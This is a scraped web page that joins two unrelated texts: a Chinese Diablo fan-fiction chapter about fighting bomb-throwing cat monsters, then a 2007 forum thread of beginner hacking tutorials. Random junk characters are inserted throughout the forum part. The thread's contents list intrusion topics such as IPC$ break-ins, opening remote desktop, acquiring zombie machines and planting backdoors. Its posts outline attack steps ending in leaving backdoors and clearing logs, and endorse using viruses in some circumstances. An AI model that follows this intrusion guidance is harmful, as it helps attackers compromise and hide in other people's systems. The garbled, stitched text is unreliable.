内容正在裁入,时间过长请刷新,请稍后........
您的位置:
第七十三章 初级炸弹
暗黑破坏神之英雄◎虚空神器著
请记住我们的网址:Www.Shushuw.Cn (书书网) 出现乱章请刷新!
鲁高因地图的环境比罗格营地差的太多了,到处都是黄沙漫天飞舞,稍远一点的地方都看不清,职业者队伍在这些地方练级也是一个巨大的考验,时时都要提高警惕,一个不好怪物接近都还不知道,那可能会死的很惨。
当然,周东林是没有这方面的顾虑的,谁叫他有小地图呢,只是他现在也有点烦恼,环境真是太恶劣了,比起罗格营地来,鲁高因这里真是差的太远了,好歹罗格营地除了***荒地,其他地方都还算是很正常的,最起码还有点树什么的,而鲁高因这里,靠的,除了沙还是沙,要不就来几块大石头,一点生命的迹象都没有。
干草高地这里当然不是周东林他们这次的最终站点,而是通过干草高地去遥远的绿洲,而这世界的人的叫法却是沙漠绿洲,至于那里的环境听说不错,以前长老会也试过在那里建设营地,只是失败了,用尽了一切的办法都不能阻止怪物重生,后来只能是不了了之,只能清理出一些地方建立传送阵。
死亡神殿也是在干燥高地这里的,只是周东林并不想去那里,死亡神殿第一层怪物经验跟古墓第四层一样,而第三层才比古墓五层经验高,但是这里的职业者却是很多的,而古墓却没有职业者在,所以周东林他们才会在那里练的那么爽。
干燥高地这里只有三种怪物,而且全部是新型怪物,洞穴跳跃者,一种类似依鸭嘴兽的怪物,只是它们爬在地上却又象青蛙,四肢爪子锋利非常,而且嘴巴有点长,一张一合间露出那些闪着寒光的牙齿,被咬上一口就有的受的。
剑齿猫,一种直立行走的猫科动物,体形类似依猫,背后还拖着一条长长的尾巴,依靠锋利的双爪击杀敌人。
至于最后一种是矛之猫,这种怪物和剑齿猫形态相近,只是它们却是另外一套攻击方式,丢炸弹。这些炸弹的伤害不低,抗性低点的职业者见到成群这种怪物那是有多远就跑多远。
这三种怪物都是速度型的,速度最快的是剑齿猫,时速达到每小时50公里左右,瞬间速度爆发超过70公里,算是非常快的了。
那拿周东林来说,整体速度在80公里左右,瞬间爆发速度130公里,可是宝宝、小罗琳、安雅这几个速度更快,个个都在100公里以上的,爆发的速度更离谱,达到了150公里,都快赶上地球上的汽车了,这还是她们现在因为等级低,敏捷也低,只要以后敏捷高了,速度更加快。
“有怪物哦”宝宝在怪物刚出来,她就看到了。
“好样的宝宝”周东林笑了笑道,这十几只剑齿猫和矛之猫都是周东林故意去碰的,他也想看看这些怪物有多厉害,值得卡夏在地图书上提醒要小心。
“我这不是怕没有饭吃嘛,如果不是这样,我怎么会提醒精神来注意。”宝宝嘀咕着说道。好在周东林并没有听到,如果真的听到了,不知道他有何感想。
这些剑齿猫比水肥战士还要快点,四十来米的距离,也就两秒间都到了。剑齿猫前面冲锋,猫之矛也跟在剑齿猫后面,而且它们手里还拿着一个黑呼呼拳头大的东西。
“呼,呼,呼”
矛之猫在接近周东林他们三十多米的时候,全部站住做起了同一个动作,向周东林他们扔出了手里黑呼呼的家伙。
“快闪。”见到那些黑呼呼的东西扔过来,周东林当然知道那些是炸弹。靠的,真他**的无耻啊这破怪物也太离谱了,别人射箭放魔法都是十来米距离的,它们倒好,三十多米就开始攻击。
其他人也知道这些是什么,不用周东林叫,早就闪了,虽然大家都没有见过炸弹攻击是什么样的,不过好歹在营地里也听过,这种攻击是属于小范围群攻的。
“轰,轰,轰,轰”
一连串的爆发声响起,黄沙飞舞,让人看不清眼前的一切。
“轰,轰,轰”
又一连片的爆发声响起,让周东林他们个个都被炸了个灰头灰脸,整身都是沙子。
“破怪物,放心哦”宝宝的声音传了过来,让周东林不禁一怔,难道又轮到宝宝被怪物摸了?
“轰,轰”
这次的爆炸声没有象上次那么密集,周东林模模糊糊的看着眼前的影子一脚就踢了出去。
“喵”
一道疼叫传出,周东林跟着跟进,一击牺牲横着砍了过去。
现在看东西都是模糊的,只有这样砍才能看到怪物,其他方式还是有一定的困难的。
三两下把这个剑齿猫干掉,周东林冲过眼前这片慌乱飞舞的沙幕,也看到了宝宝和小萝琳她们两个正在干什么,原来她们整在夺取矛之猫手上的炸弹。
看着她们几个,周东林差点笑了起来,特别是宝宝,她一手扳着矛之猫手上的炸弹,一手猛的往矛之头头上锤,而矛之猫死死的抓住手里的炸弹不放,这样就形成了一人一怪在互相角力。
见到矛之猫有危险,那些剑齿猫想回去帮忙,只不过冲上来容易,回去却艰难无比,卡尔拦下一只,周东林又拦下一只,安雅再拦下一只,刚才又被杀了两只,总共才8只剑齿猫,这样已经去了一半了,加上这会少了好几只矛之猫的炸弹攻击,安娜她们几个可以看清眼前的一切,那攻击就是接踵而来的,半路上都死了好几只,最后只剩下一个剑齿猫跑回去帮忙。
“呼”
好几个炸弹往宝宝和小萝琳身上飞去,让她们两个不得不放开了各自抓住的矛之猫,闪避飞来的炸弹。
说起这矛之猫也真是搞笑,被宝宝和小萝琳抓住了手上的炸弹后,它们缺少攻击的手段,竟然只会傻呼呼的和宝宝她们抢手上炸弹的控制权。
周东林收拾自己拦下的剑齿猫,马上向一个矛之猫冲去,那些个矛之猫见到这个这么有威胁性的人类冲来,都放弃了继续攻击宝宝和小罗琳,转而攻击周东林,只是他们这些攻击都是徒劳的,这些矛之猫扔出自己手上炸弹的方式也是有点不对,竟然有点象是抛射,也不能说是抛射,只是它们都是扔的高了一些,而不是直扔,抛射武器速度必然是慢些的,对于速度快的人来说,这个就很容易闪避了。
“轰”
好几个炸弹在周东林身后炸开,只是他理都不理,照样冲向矛之猫。那些矛之猫有点慌了,好几个炸弹都没有炸到敌人,它们这会已经连连扔出手里的炸弹,只是是每次都击空,倒是把地上的沙子炸了不少上天空。
见到周东林牵制住了一部分的矛之猫,小萝琳和宝宝又继续抢炸弹大业,小萝琳聪明倒是聪明,她只是抢,并没有 用自己的武器攻击矛之猫,怕把它杀掉了,连炸弹一起消失了。
只是周东林并不看好这个抢劫计划,不过小萝琳和宝宝这么好兴趣,也不好打击她们的积极性,只是把另外几只矛之猫牵制住,不让这些矛之猫攻击到她们两个。
“放手哦,再不放我打你了。”宝宝拿眼瞪着自己面前的矛之猫,一脸的恨恨之色,对与矛之猫死都不放手,宝宝也是一脸的无奈。
而矛之猫却是争着两只大眼睛无辜的看着宝宝,对方要抢自己吃饭的家伙,矛之猫那能让宝宝得逞,那是死也不会放手的。
而等到安娜她们上来,周东林也就不在牵制,而是快速接近一只矛之猫杀将了起来,三下牺牲攻击就把这个矛之猫干掉了,血一点都没有少。周东林武器是有吸血属性的,有15%之多,只要不是连续受到攻击,周东林那是不会怎么减血的。
“咕”
一声响动,一个黑呼呼的东西掉了下来,周东林心里一喜,这炸弹不是来了嘛,快速的伸手捡起,周东林继续向下一个矛之猫接近,不过这些矛之猫生命值都不怎么多了,而且也不用周东林去杀,安娜她们一人一个已经分完了。
套出刚才那个黑呼呼的炸药看了看,这炸药的伤害力还不低,让周东林不禁嘀咕了一声厉害,如果这种东西能大量制造,对于职业者还是很有帮助的。
初级炸药
元素伤害力:80
数量:13
需要等级:20
使用方法:双手,一手持炸弹,另一只放在炸弹上默念数量,拿好一个扔出去。
周东林试了试方法,还真的象介绍上说的一样,可以分开炸弹,这样的话,使用起来也很方便,就算一人拿一个都可以。
把炸药合了起来,周东林往大家看去,除了小萝琳和宝宝外,其他人都把矛之猫收拾掉了,而宝宝和小萝琳却着急了起来,不时的对自己面前的猫之猫怒声叫喊放手。
周东林看不过眼了,走过去一手抓住矛之猫拿着炸弹的手大力一扳,炸弹就落在了周东林手里面,只是周东林看了看手上的炸弹却很是失望,把炸弹递给小萝琳让她自己看看。V!~!
你正在阅读,如有错误,请及时联系我们纠正!
,如你喜欢
请收藏!
[快捷键:←]
[快捷键:→]
别人正在看什么?
Copyright (C) 2009
·shushuw(
Www.Shushuw.Cn
) All Rights Reserved 版权所有
本站为非营利性网站,作品版权属于原作者,所收录作品、社区话题及书库评论均属作者或读者其个人观点和兴趣,与本站立场无关菜鸟学习初级教程-----(原文来自黑客攻防一书)
当前离线
81888 帖子
624 精华
3287 阅读权限
90 在线时间
10 小时 注册时间
2006-9-4 最后登录
2010-6-5 TW技术CTO
624 精华
3287 最后登录
2010-6-5 字体大小:
发表于 2007-10-9 15:13
菜鸟学习初级教程-----(原文来自黑客攻防一书)
我花了一天时间整理,可能有些错误。
- |4 o* G0 ?* q
由于文章比较多,我也就没好细细的看,大家谅解下。
4 c9 U* C3 Q2 C, Z3 [7 x# I4 E7 n' j
# P: O4 U6 l/ Y* D. X' p3 _
终于完了哈,累死我了........(楼数可能有点错误,大家请见谅!!)大家可以回复了!!
0 Q1 C3 W( o2 U0 E
基本技能...............................................................................2楼
4 h+ C- }: q- U. `. J" }3 a
黑客初级技术讲解(上)..........................................................3楼
2 i9 D5 @& B# b/ [. I8 C
黑客初级技术讲解(中)..........................................................4楼
$ c# t( E3 J' j$ t# I( f
黑客初级技术讲解(下)..........................................................5楼
) u$ X. Y7 A# F% P
基础知识(1).......................................................................6楼 l0 Y* g0 {4 r/ i0 n6 U
基础知识(2).......................................................................7楼
9 e( L/ F- g+ X' n. ^0 t
基础知识(3).......................................................................8楼
# b6 G; M' t: ^. }9 |! h: {
基础知识(4).......................................................................9楼
$ X; W% {7 P- l4 B5 r
基础知识(5).....................................................................10楼
: f5 {8 E8 a) ?+ S9 @- t
基础知识(6).....................................................................11楼
' j3 [( _2 T v4 _
初级技术.............................................................................12楼
( d+ ^/ w0 s- G2 v7 }# `
黑客兵器之木马篇(上)........................................................13楼
$ m4 H( j" Y- J
黑客兵器之木马篇(下)........................................................14楼
* d- M6 l1 \/ h! L
黑客兵器之扫描篇(上)........................................................15楼
* v8 i* f$ y! W7 E. P) n
0 V$ x; G0 c# X( R
第2页 Q' H0 b+ L9 v: E1 `
0 _, E4 w9 X: R
黑客兵器之扫描篇(下)........................................................16楼
" _* e8 A8 f# ? o% E# l. B7 n2 x
代理、肉鸡、跳板的概念........................................................17楼
* P; q. S( @+ i6 F
网络***概念.......................................................................18楼
( P2 H2 e4 H) W: M
系统进程信息.......................................................................19楼
" k7 q, H5 O/ Y* O8 ?# Q8 Z2 B
端口全解析(上).................................................................20楼
; ?0 O/ O! }5 h+ F5 C# R
端口全解析(下).................................................................21楼
" `. |6 T: V9 C& Q. N! @3 u. i
端口详细说明表(上)...........................................................22楼
' |" W' ^8 ]- [2 N, f
端口详细说明表(下)...........................................................23楼
" M2 k. Q" d# X
菜鸟进阶(1).....................................................................24楼
6 B* n$ }/ \; F S- r
...........................
4 I& r% w5 I3 X& w3 @! R7 Q
菜鸟进阶(7).....................................................................30楼
5 `7 @ B( [0 i' B8 z! y
" V4 K: C' W- x. E8 T/ }
" h0 N3 y6 ?. F H
0 h5 i' o+ f( T* N- p+ K
菜鸟进阶(8).....................................................................31楼
( d/ z C3 E" Y
菜鸟进阶(9).....................................................................32楼
2 ]6 e5 b7 z7 W% }- Y) U7 c
1-32楼教程下载....................................................................33楼
5 G- l. Y; V9 l' b# Y
木马防范及一些端口的关闭(上)............................................34楼
% [1 R$ K; h- }' a, m
木马防范及一些端口的关闭(下)............................................35楼
" M9 ]+ {" f7 X D
黑客窃取密码及防范..............................................................36楼
! Z# h* a9 r/ q3 [- B7 K6 S
SSL.TLS.WTLS原理(上).....................................................37楼
3 q+ O$ ?, [. w+ K; C
SSL.TLS.WTLS原理(下).....................................................38楼
7 e/ y0 h: j$ Z/ l% I
关于MAC地址和IP地址的知识..................................................39楼
2 v' H! _5 g# j, T* ?, j
术语表(1)........................................................................40楼
9 f T3 k/ |- X# U& D# ^
.........................
; _7 `" @0 h7 h8 i3 N6 X0 \
术语表(4)........................................................................44楼
5 M/ v+ [3 M- u# a9 A# @+ U
34楼-44楼内容下载...............................................................45楼
1 Y# F2 N. w3 [0 x
3 t$ }0 O6 }4 o$ m/ S
; y) |! [4 V! F+ H
个人电脑安全.......................................................................46楼
( m: g! }' y8 o j* A* ?
网络安全知识(1)...............................................................47楼
7 s. ]5 A9 z- M. ?: S# ~8 i
........................ x$ Q/ H9 r/ t$ I
网络安全知识(7)...............................................................53楼
. p+ v& [* j7 B- f& C# B
防范非系统用户破坏..............................................................54楼
, r, t3 P! r( {3 j5 F5 ^
44-54楼内容下载..................................................................55楼 R# c9 \* {- `1 W4 D1 C/ K
黑客扫描特征及易受攻击端口..................................................56楼
3 X6 B- x% k2 r0 y( G
开始..运行..命令集合.............................................................57楼
! g, [ B: z! z) ^3 ]
PING命令及使用技巧.............................................................58楼
/ g% ?* X' h- g+ d8 m; _3 R' r6 v
GHOST详细解说(1)...........................................................59楼
% S# i4 ~ W/ M q" g* s
GHOST详细解说(2)...........................................................60楼
( W- B$ o1 p) W" R
1 A# C4 K. V$ H$ J& n6 k
: b9 _' b2 U9 O2 n. q5 A
! q3 B, s9 f$ Q( O* v+ Q7 u6 q3 s: F
GHOST详细解说(3)...........................................................61楼
6 [$ N: k- {" t2 c5 `
56楼到61楼内容下载.............................................................62楼
0 Y% i/ N" O" u
ipc$详细解说大全(1)..........................................................63楼
, g1 D- T2 b4 c . h7 B6 R
..............................
) @4 } ^9 |) R, D- a: P! ]
ipc$详细解说大全(5)..........................................................67楼
# Q* B& W+ f6 v7 @. C5 u6 {
I P C $ 入 侵图文结合............................................................68楼
' z# v; L5 y9 f5 `8 |# a 常见ASP脚本攻击及防范技巧...................................................69楼
1 q$ r1 R8 g; o( C- q/ o
37秒迅速破解网吧.................................................................70楼
) O; b1 q7 R8 D& L3 E
开启3389的5种方法(上)......................................................71楼
- T1 h) r- n. S: O8 P$ y& t! m
开启3389的5种方法(下)......................................................71楼
% [; n* C! V& q1 k9 p
网络常见攻击及防范手册(上)................................................73楼
3 i& b$ M5 a1 D
网络常见攻击及防范手册(下)................................................74楼
5 M5 e9 Y, `! G: x+ H
DOS攻击原理及方法介绍.........................................................75楼
' q7 L/ z: ]2 Z/ e" s: ^
! s- {& A+ |0 c. N, ~8 H7 u( {# y
) i. }5 h3 n9 N( {* x: b1 u% s
' B# a, n* j t7 Y! S: g
如何突破各种防火墙..............................................................76楼
* r$ Z0 V2 [* }% o1 F7 t! I8 j: ]: `
蠕虫技术(上)....................................................................77楼
$ w, j) `. k1 ~
蠕虫技术(中)....................................................................78楼
3 C: m, Y* D1 d
蠕虫技术(下)....................................................................79楼
3 n6 G' H( z' z7 E" c1 X
壳(上).............................................................................80楼
9 t, l6 V& E/ q( x3 n8 M/ Z6 C# k
壳(下).............................................................................81楼
; I8 i: E" N' A( {2 Y+ k
简单黑客工具使用.................................................................82楼
# p4 O/ c6 X X/ `: e7 I8 S2 b
浅谈绑定之应用....................................................................83楼
1 A5 @. ^6 a1 l: A% p
永远的后门..........................................................................84楼
+ t$ y8 H B- E8 m
入门者如何获得肉鸡..............................................................85楼
4 R9 P- q. I3 M( S: e: O/ I
流光的使用方法....................................................................86楼
( L& F) Z% J* I" L+ @% M
玩木马................................................................................87楼
; n4 Y: ^, y8 l$ H- m
溢出专集.............................................................................88楼
. p' Y7 u4 _/ b
NET START可以起用命令一览表(上).....................................89楼
8 s6 ?1 y+ v& g8 J
NET START可以起用命令一览表(下).....................................90楼
/ h; ?* w0 X- n* \# j+ I
' ^! K, Z0 Q0 Y u$ s" N B
(楼数可能有点错误,大家请见谅!!)
当前离线
81888 帖子
624 精华
3287 阅读权限
90 在线时间
10 小时 注册时间
2006-9-4 最后登录
2010-6-5 TW技术CTO
624 精华
3287 最后登录
2010-6-5 发表于 2007-10-9 15:13
一个黑客的基本技能
3 _* R: Y! }1 N4 ?* W
/ m+ u0 {& p0 a K3 z: L5 `
1、黑客的精神态度是很重要的,但技术则更是重要。黑客的态度虽然是无可取代,随著新科技的发明和旧技术的取代,这些工具随时间在慢慢的改变。例如:以往总是会学会用机器码写程序,直到最近我们开始使用HTML。不过,在1996年末,当然,这是基础的hacking技能。在1997年,理所当然的,你必须学会C。 但,如果你只是学一种语言,那么你不能算是一位黑客,了不起只能算是一个programmer。除此,你还必须学会学会以独立于任何程序语言之上的概括性观念来思考一件程序设计上的问题。要成为一位真正的黑客,你必须要能在几天之内将manual内容和你目前己经知道的关连起学会一种新的语言。也就是说,你必会学还了C之外的东西,你至少还要会LISP或Perl(Java也正在努力的挤上这个名单; 译者注: 我很怀疑这份名单)。除了几个重要的hacking常用语言之外,这些语言提供你一些不同的程序设计途径,并且让你在好的方法中学习。
3 n4 r! N2 v: C
3 N- U. N/ e9 c# v0 a) J
程序设计是一种复杂的技术,我没辨法在这提供完整的学习步骤。但是我能告诉你一些在书本上和课堂上所没有的东西(有很多,几乎全部最好的黑客们都是自习而来的)。(a) 读别人的程序码;(写程序,这两项是不错的方法。学习写程序就像在学习写一种良好的自然语言,最好的方法是去看一些专家们所写的东西,然后写一些你自己的东西,然后读更多,再写更多。然后一直持续,一直到你发展出一种属于自己的风格和特色。要找到好的程序码来看是很一件很困难的事,因为,对菜鸟黑客们而言,适于供他们阅读和努力的大型程序的source数量很少。但这事己有了戏剧性的变化了; 现在免费的供应的软件、程序设计工具和操作系统(大都公开提供 source,而且全都是由黑客们写成的)到处可看。进入下一个主题。
: @) w! a: r3 {. C9 o: `5 M5 G
9 _3 E7 x2 ~# F6 k+ k" P! k9 X+ ]
2、取得一个免费的 UNIX,并学习使用和维护。我先假设你己经有一部个人电脑或者是可以使用任何一部(现在的小孩子真幸福,可如此轻易的拥有 :-))。 取得黑客技巧的第一个步骤是取得一份Linux 或者一份免费的 BSD-Unix,并将它***在自己的机器,并使之顺利的运作。没错,在这个世界上除了Unix之外,还有其它的操作系统。但是他们只提供bianry,你不能看到他们的程序码,你也不能修改他们。想要在DOS或Windows或MacOS开始hacking,无疑就是要你绑著枷锁跳舞一样。
1 W, T- Y# N. Z1 d
8 b- ~+ F7 p+ @# a) ^
除此之外,Unix是Internet上的操作系统。当你在不懂Unix的情况下学习使用Internet时,你没辨法在不懂Unix的情况下成为Internet的黑客。因为这个原故,现在的黑客文化还是很牢固的以Unix为中心。(这并不完全是正确的,而且有些活在旧时代的黑客甚至也不喜欢这种情形,但是Unix和Internet之间的共生共成己经到了牢不可破的地步,即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些,把Unix装起来吧! (我自己是喜欢Linux,但是还有其它的东东可用。) 学习它,让它运作起来,让它陪你努力精进。 用他向整个Internet喊话。看程序码,改程序。
3 w: n/ i5 S0 \; D# K
/ B0 m$ T1 |$ N9 H
有一天你成为一位高竿的黑客,你回头往后看时会发现,你得到比Microsoft操作系统所能提供的还要好的程序设计工具(包括 C,Li 和 Perl)。而且得到快乐,并学到比共生共成己经到了牢不可破的地步,即使是Microsoft的大块肌肉也没能在上面留下明显的伤痕。) 因些,把Unix装起来吧! (我自己是喜欢Linux,但是还有其它的东东可用。) 学习它,让它运作起来,让它陪你努力精进。用他向整个Internet喊话。 看程序码,改程序。有一天你成为一位高竿的黑客,你回头往后看时会发现,你得到比Microsoft操作系统所能提供的还要好的程序设计工具(包括 C,Li 和 Perl)。而且得到快乐,并
! k5 B; E- v2 K0 [( r- n
学到比你想像中的还要多的知识。关于学习Unix,在Loginataka有更多的资料。(
2 D, R, `& w# n4 ]# N- U
看一下Linux distribution的目录或 Linux CD,并把自己交付给它。
, Z+ i2 Q. C- a( `& m' H; k
& N1 `2 |! y1 t1 s: [
3、学习使用World Wide Web并学会写 HTML。
+ @! r) W) _; m: H6 Q% n7 R
在黑客文化创造出来的东西,大多在他们的活动范围外被使用著,如,在工厂和辨公室或大学被漠漠的使用著。但Web是一个很大的例外,这个黑客眼中的大玩具甚至还被政客们接受,并巧巧的在改变这个世界。因此(还有很多好的理由),你必须学习Web。并不只是学习使用browser(这太容易了)而己,还要学会写HTML这个Web的标签语言。如果你不知道如何设计程序,写HTML也可以给一些习惯上的帮助。嗯!! 建立home page吧! 不过,有一个home page 并没任何特别之处能让你成为一位黑客。Web上到处都是home page,而且大部份都没什么重点,没什么内容的烂泥 -- 很好看的烂泥巴,但是看起来都一样,差不多。
( {1 u$ p+ q9 ^$ B7 Y& D# I ~) s
3 Z/ p+ ]2 p$ H9 H
4、至少学会以下的其中两种:
) s6 U E. e v7 {& G4 h: `
一、网站服务器程序ASP、PHP、CGI、jsP
% D5 R. E/ q4 f/ A) N' I) i
我个人认为CGI是最难学的其中一种。
3 K+ a6 u5 h0 \% J: ?# y
二、程序语言:C语言、C++、VB、J***A、PERL、DELPHI、汇编语言
5 _7 U% e2 r+ B* U( w6 `
不过我认为C语言的通用性最好,可以跨平台(操作系统)使用。
3 h* z. R7 P. Q* o. ` R
还要试着自己写程序、开发软件等工作。
2 K! a6 b$ H, s7 N; o; d! n* |- h' _
三、数据库管理软件:MYSQL、SQL、FOXPRO……等。
( J5 T; l( u+ o
四、几种常用的操作系统:WIN98、WIN2000、WINNT、WINXP、UNIX、LINUX、要是能学到UNIX那是最好不过的了。最最基本的WIN2K、WINNT也要学会吧。
* {. I+ i+ F& {
如果以上的你都会了,那么你已经是个高手了。
当前离线
81888 帖子
624 精华
3287 阅读权限
90 在线时间
10 小时 注册时间
2006-9-4 最后登录
2010-6-5 TW技术CTO
624 精华
3287 最后登录
2010-6-5 发表于 2007-10-9 15:13
黑客初级技术讲解(上)
6 A! L; j0 ~! D4 O+ u) L
+ N$ d5 L o: r, E2 U# h
网络安全从其本质上来讲就是网络上的信息安全。从广义来说,凡是涉及到网络上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。确保网络系统的信息安全是网络安全的目标,信息安全包括两个方面:信息的存 储安全和信息的传输安全。信息的存储安全是指信息在静态存放状态下的安全,如是否会被非授权调用等。信息的传输安全是指信息在动态传输过程中安全。为了确保网络信息的传输安全,有以下几个问题:
+ [$ B6 L4 m' x4 r, Z" W
( i- C+ K" \* @! M! U2 Q
(1)对网络上信息的***
' ?1 c& \! P8 h# Z) G" w
(2)对用户身份的仿冒
- p+ A$ N9 Y" S2 Q* t2 I$ @
(3)对网络上信息的篡改
! Y5 ?# l( L Q/ J2 {( X
(4)对发出的信息予以否认
- Q- [$ T9 \7 ~2 t4 g$ i! D
(5)对信息进行重发
7 o; ^# J0 k+ h
& o/ @! U; w2 v# `* G! U2 R- Q
对于一般的常用入侵方法主要有
8 y( a. A k& T: k
" q, y( Y0 X% l0 P5 ^
1.口令入侵
2 i# A3 {4 w! y f5 u" z
2 S% f% a; x1 A7 c D& B
所谓口令入侵,就是指用一些软件解开已经得到但被人加密的口令文档,不过许多黑客已大量采用一种可以绕开或屏蔽口令保护的程序来完成这项工作。对于那些可以解开或屏蔽口令保护的程序通常被称为“Crack”。由于这些软件的广为流传,使得入侵电脑网络系统有时变得相当简单,一般不需要很深入了解系统的内部结构,是初学者的好方法。
; {" | r0 R) M" Z8 a1 A# x9 A: D: l
! E. Y! s, Z$ O- P5 `# v# ^! S
2.特洛伊木马术
# F9 q3 E) m% E# u
3 [$ N% a6 D0 R" G% k. N
说到特洛伊木马,只要知道这个故事的人就不难理解,它最典型的做法可能就是把一个能帮助黑客完成某一特定动作的程序依附在某一合法用户的正常程序中,这时合法用户的程序代码已被该变。一旦用户触发该程序,那么依附在内的黑客指令代码同时被激活,这些代码往往能完成黑客指定的任务。由于这种入侵法需要黑客有很好的编程经验,且要更改代码、要一定的权限,所以较难掌握。但正因为它的复杂性,一般的系统管理员很难发现。
" g9 B/ V" U8 @; p- R2 V
6 S+ M% c- O/ X# S+ k4 ^" Y
3.***法
' H, z" P" f/ f
% u+ c# y0 ^6 S& q
这是一个很实用但风险也很大的黑客入侵方法,但还是有很多入侵系统的黑客采用此类方法,正所谓艺高人胆大。
, V* C! J* c& {$ g" }5 v8 D6 P
+ u( w* K1 f$ C* V: [ }
网络节点或工作站之间的交流是通过信息流的转送得以实现,而当在一个没有集线器的网络中,数据的传输并没有指明特定的方向,这时每一个网络节点或工作站都是一个接口。这就好比某一节点说:“嗨!你们中有谁是我要发信息的工作站。”
5 w' N% W, K. d$ j& c3 B# O
- Z7 R. P( _" I
此时,所有的系统接口都收到了这个信息,一旦某个工作站说:“嗨!那是我,请把数据传过来。”联接就马上完成。
: s' ?% P5 n+ v: l7 a& G0 }( p
- f. [% B3 t; K- z3 M0 _# E
目前有网络上流传着很多嗅探软件,利用这些软件就可以很简单的***到数据,甚至就包含口令文件,有的服务在传输文件中直接使用明文传输,这也是非常危险的
' Y1 T, X: _% E) k. W: q
4.E-mail技术
9 D. r- M( H! c) f, r6 j" b
+ {. P# v4 R( J% `
使用email加木马程序这是黑客经常使用的一种手段,而且非常奏效,一般的用户,甚至是网管,对网络安全的意识太过于淡薄,这就给很多黑客以可乘之机。
% B2 `( U2 L( D! Q3 v/ i) M
' L! }+ l% E, e+ H z
5.病毒技术
/ C. i7 f6 N; X$ y$ G, G% P
作为一个黑客,如此使用应该是一件可耻的事情,不过大家可以学习,毕竟也是一种攻击的办法,特殊时间,特殊地点完全可以使用。
4 S: p- D6 }: \6 m0 Z
( {, O3 o) E: a; h. y/ Z
6.隐藏技术
% q, z2 d/ C/ i
/ [- V' r; ]2 e% R/ X
网络攻击的一般步骤及实例
( o. y$ h5 @! o8 O' i4 X
; U6 Z4 t( l; B" B3 t
攻击的准备阶段
% F- N9 ?5 h. R; v" Z7 Q* W
: n$ w' w" j" U" D, s
首先需要说明的是,入侵者的来源有两种,一种是内部人员利用自己的工作机会和权限来获取不应该获取的权限而进行的攻击。另一种是外部人员入侵,包括远程入侵、网络节点接入入侵等。本节主要讨论远程攻击。
/ y* G3 a/ P1 e, `4 X' D/ z" f# c
. I' ^+ i3 V, p. ^
进行网络攻击是一件系统性很强的工作,其主要工作流程是:收集情报,远程攻击,远程登录,取得普通用户的权限,取得超级用户的权限,留下后门,清除日志。主要内容包括目标分析,文档获取,破解密码,日志清除等技术,下面分别介绍。 N: ~5 [5 ?- ~: V
% \8 q. f1 }( x; ^' x4 Y
1.确定攻击的目的
: [5 l J3 e+ v; E* ^6 m8 {
% A/ P' g5 `( N7 W5 j, H
攻击者在进行一次完整的攻击之前首先要确定攻击要达到什么样的目的,即给对方造成什么样的后果。常见的攻击目的有破坏型和入侵型两种。破坏型攻击指的只是破坏攻击目标,使其不能正常工作,而不能随意控制目标的系统的运行。要达到破坏型攻击的目的,主要的手段是拒绝服务攻击(Denial Of Service)。另一类常见的攻击目的是入侵攻击目标,这种攻击是要获得一定的权限来达到控制攻击目标的目的。应该说这种攻击比破坏型攻击更为普遍,威胁性也更大。因为黑客一旦获取攻击目标的管理员权限就可以对此服务器做任意动作,包括破坏性的攻击。此类攻击一般也是利用服务器操作系统、应用软件或者网络协议存在的漏洞进行的。当然还有另一种造成此种攻击的原因就是密码泄露,攻击者靠猜测或者穷举法来得到服务器用户的密码,然后就可以用和真正的管理员一样对服务器进行访问。
+ w4 w( i( Y1 B j; r% s% ]. L0 b
7 L# H4 k l* }* u' q
2.信息收集
( z' J' V Y9 p9 E& H+ m [% [& l) o6 R+ q
除了确定攻击目的之外,攻击前的最主要工作就是收集尽量多的关于攻击目标的信息。这些信息主要包括目标的操作系统类型及版本,目标提供哪些服务,各服务器程序的类型与版本以及相关的社会信息。
; A+ h& y7 }% C. p- r$ |8 u
2 G+ {, o9 ?, `. f9 H1 f8 @
要攻击一台机器,首先要确定它上面正在运行的操作系统是什么,因为对于不同类型的操作系统,其上的系统漏洞有很大区别,所以攻击的方法也完全不同,甚至同一种操作系统的不同版本的系统漏洞也是不一样的。要确定一台服务器的操作系统一般是靠经验,有些服务器的某些服务显示信息会泄露其操作系统。例如当我们通过TELNET连上一台机器时,如果显示
6 @* [7 O1 g+ w4 u- z, i* F
0 u, E! R6 v% T; E
Unix(r)System V Release 4.0
6 A: |& D8 x6 G2 }
login:
6 M! a( w k5 y' Z" R2 Z v
* N" g. ~: [/ w5 g4 \9 _5 Y
那么根据经验就可以确定这个机器上运行的操作系统为SUN OS 5.5或5.5.l。但这样确定操作系统类型是不准确的,因为有些网站管理员为了迷惑攻击者会故意更改显示信息,造成假象。
1 W m. M1 G, f4 W) ^ X
还有一种不是很有效的方法,诸如查询DNS的主机信息(不是很可靠)来看登记域名时的申请机器类型和操作系统类型,或者使用社会工程学的方法来获得,以及利用某些主机开放的SNMP的公共组来查询。
5 ^7 p4 v3 S! `, P1 G9 J8 ]
, j/ S9 A/ N) k: Y1 J/ k/ U; D
另外一种相对比较准确的方法是利用网络操作系统里的TCP/IP堆栈作为特殊的“指纹”来确定系统的真正身份。因为不同的操作系统在网络底层协议的各种实现细节上略有不同。可以通过远程向目标发送特殊的包,然后通过返回的包来确定操作系统类型。例如通过向目标机发送一个FIN的包(或者是任何没有ACK或SYN标记的包)到目标主机的一个开放的端口然后等待回应。许多系统如windows、 BSDI、 CISCO、 HP/UX和 IRIX会返回一个RESET。通过发送一个SYN包,它含有没有定义的TCP标记的TCP头。那么在Linux系统的回应包就会包含这个没有定义的标记,而在一些别的系统则会在收到SYN+BOGU包之后关闭连接。或是利用寻找初始化序列长度模板与特定的操作系统相匹配的方法。利用它可以对许多系统分类,如较早的Unix系统是64K长度,一些新的Unix系统的长度则是随机增长。还有就是检查返回包里包含的窗口长度,这项技术根据各个操作系统的不同的初始化窗口大小来唯一确定它们。利用这种技术实现的工具很多,比较著名的有NMAP、CHECKOS、QUESO等。
% F; T1 A/ c. T( {5 J
" \, w, R+ ]* ?! O5 P& u, l
获知目标提供哪些服务及各服务daemon的类型、版本同样非常重要,因为已知的漏洞一般都是对某一服务的。这里说的提供服务就是指通常我们提到的喘口,例如一般TELNET在23端口,FTP在对21端口,WWW在80端口或8080端口,这只是一般情况,网站管理完全可以按自己的意愿修改服务所***的端口号。在不同服务器上提供同一种服务的软件也可以是不同,我们管这种软件叫做daemon,例如同样是提供FTP服务,可以使用wuftp、proftp,ncftp等许多不同种类的daemon。确定daemon的类型版本也有助于黑客利用系统漏洞攻破网站。
